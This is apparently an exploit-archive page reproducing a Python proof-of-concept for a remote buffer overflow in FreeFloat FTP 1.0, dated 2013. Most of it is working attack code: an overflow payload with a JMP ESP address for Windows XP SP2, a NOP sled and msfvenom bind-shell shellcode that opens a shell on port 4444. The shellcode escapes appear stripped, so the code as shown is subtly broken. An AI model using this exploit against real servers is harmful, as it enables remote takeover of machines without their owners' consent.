FreeFloat FTP 1.0 Raw Commands Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FreeFloat FTP 1.0 Raw Commands Buffer Overflow
# Published : 2013-02-11
# Author :
# Previous Title : Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution
# Next Title : DataLife Engine preview.php PHP Code Injection

#!/usr/bin/env python

# Exploit Title: FreeFloat FTP raw commands buffer overflow
# Date: 10 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.freefloat.com/
# Version: FreeFloat FTP 1.0
# Tested on: Windows XP Pro SP2, English
#
# Description: 
# FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and 
# execute arbitrary code when a long and invalid raw command is sent to it. 
#

import socket, struct, sys

if len(sys.argv) < 3:
	print "usage: %s IP port" % (sys.argv[0])
	sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

# Bind shellcode generated with msfvenom: 
#     msfvenom -p windows/shell_bind_tcp 
#         -b "x00x0ax0bx27x36xcexc1x04x14x3ax44xe0x42xa9x0d" 
#         -e x86/fnstenv_mov 
#
# [*] x86/fnstenv_mov succeeded with size 366 (iteration=1)
shellcode = (
"x6ax56x59xd9xeexd9x74x24xf4x5bx81x73x13xc8" +
"x4cxabx8cx83xebxfcxe2xf4x34xa4x22x8cxc8x4c" +
"xcbx05x2dx7dx79xe8x43x1ex9bx07x9ax40x20xde" +
"xdcxc7xd9xa4xc7xfbxe1xaaxf9xb3x9ax4cx64x70" +
"xcaxf0xcax60x8bx4dx07x41xaax4bx2axbcxf9xdb" +
"x43x1exbbx07x8ax70xaax5cx43x0cxd3x09x08x38" +
"xe1x8dx18x1cx20xc4xd0xc7xf3xacxc9x9fx48xb0" +
"x81xc7x9fx07xc9x9ax9ax73xf9x8cx07x4dx07x41" +
"xaax4bxf0xacxdex78xcbx31x53xb7xb5x68xdex6e" +
"x90xc7xf3xa8xc9x9fxcdx07xc4x07x20xd4xd4x4d" +
"x78x07xccxc7xaax5cx41x08x8fxa8x93x17xcaxd5" +
"x92x1dx54x6cx90x13xf1x07xdaxa7x2dxd1xa0x7f" +
"x99x8cxc8x24xdcxffxfax13xffxe4x84x3bx8dx8b" +
"x37x99x13x1cxc9x4cxabxa5x0cx18xfbxe4xe1xcc" +
"xc0x8cx37x99xfbxdcx98x1cxebxdcx88x1cxc3x66" +
"xc7x93x4bx73x1dxc5x6cxbdx13x1fxc3x8exc8x5d" +
"xf7x05x2ex26xbbxdax9fx24x69x57xffx2bx54x59" +
"x9bx1bxc3x3bx21x74x54x73x1dx1fxf8xdbxa0x38" +
"x47xb7x29xb3x7exdbx41x8bxc3xf9xa6x01xcax73" +
"x1dx24xc8xe1xacx4cx22x6fx9fx1bxfcxbdx3ex26" +
"xb9xd5x9exaex56xeax0fx08x8fxb0xc9x4dx26xc8" +
"xecx5cx6dx8cx8cx18xfbxdax9ex1axedxdax86x1a" +
"xfdxdfx9ex24xd2x40xf7xcax54x59x41xacxe5xda" +
"x8exb3x9bxe4xc0xcbxb6xecx37x99x10x7cx7dxee" +
"xfdxe4x6exd9x16x11x37x99x97x8axb4x46x2bx77" +
"x28x39xaex37x8fx5fxd9xe3xa2x4cxf8x73x1dx4c" +
"xabx8c"
)

# EIP overwritten at offset 251
# JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English
jmpesp = struct.pack("<I", 0x7CA58265) 
buf = "x41" * 251 + jmpesp + "x90" * 129 + shellcode

print "[+] exploiting target %s:%d" % (ip, port)
print "[+] try connecting to %s on port 4444" % (ip)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(1024)
s.send(buf + "rn")